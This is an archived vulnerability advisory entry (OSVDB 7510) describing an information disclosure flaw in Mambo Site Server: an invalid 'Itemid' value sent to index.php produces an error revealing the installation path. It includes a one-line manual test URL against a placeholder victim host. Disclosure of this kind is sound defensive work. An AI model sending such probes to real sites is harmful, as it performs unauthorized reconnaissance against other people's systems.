Mambo Site Server index.php Itemid Variable Path Disclosure

2002-12-12T00:00:00
ID OSVDB:7510
Type osvdb
Reporter euronymous(just-a-user@yandex.ru)
Modified 2002-12-12T00:00:00

Description

Vulnerability Description

Mambo Site Server contains a flaw that may lead to an unauthorized information disclosure. This flaw exists because the application does not validate 'Itemid' variables upon submission to the 'index.php' script. Is is possible for a remote attacker to send a specially crafted request to the 'index.php' script which would cause an error message to be returned that reveals the installation path, resulting in a loss of confidentiality.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Mambo Site Server contains a flaw that may lead to an unauthorized information disclosure. This flaw exists because the application does not validate 'Itemid' variables upon submission to the 'index.php' script. Is is possible for a remote attacker to send a specially crafted request to the 'index.php' script which would cause an error message to be returned that reveals the installation path, resulting in a loss of confidentiality.

Manual Testing Notes

http://[victim]/mambo/index.php?Itemid=invalid_string

References:

Vendor URL: http://www.miro.com.au/ Related OSVDB ID: 7511 Related OSVDB ID: 7514 Related OSVDB ID: 7512 Related OSVDB ID: 7515 Related OSVDB ID: 7513 Related OSVDB ID: 7509 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0028.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-12/0111.html ISS X-Force ID: 10856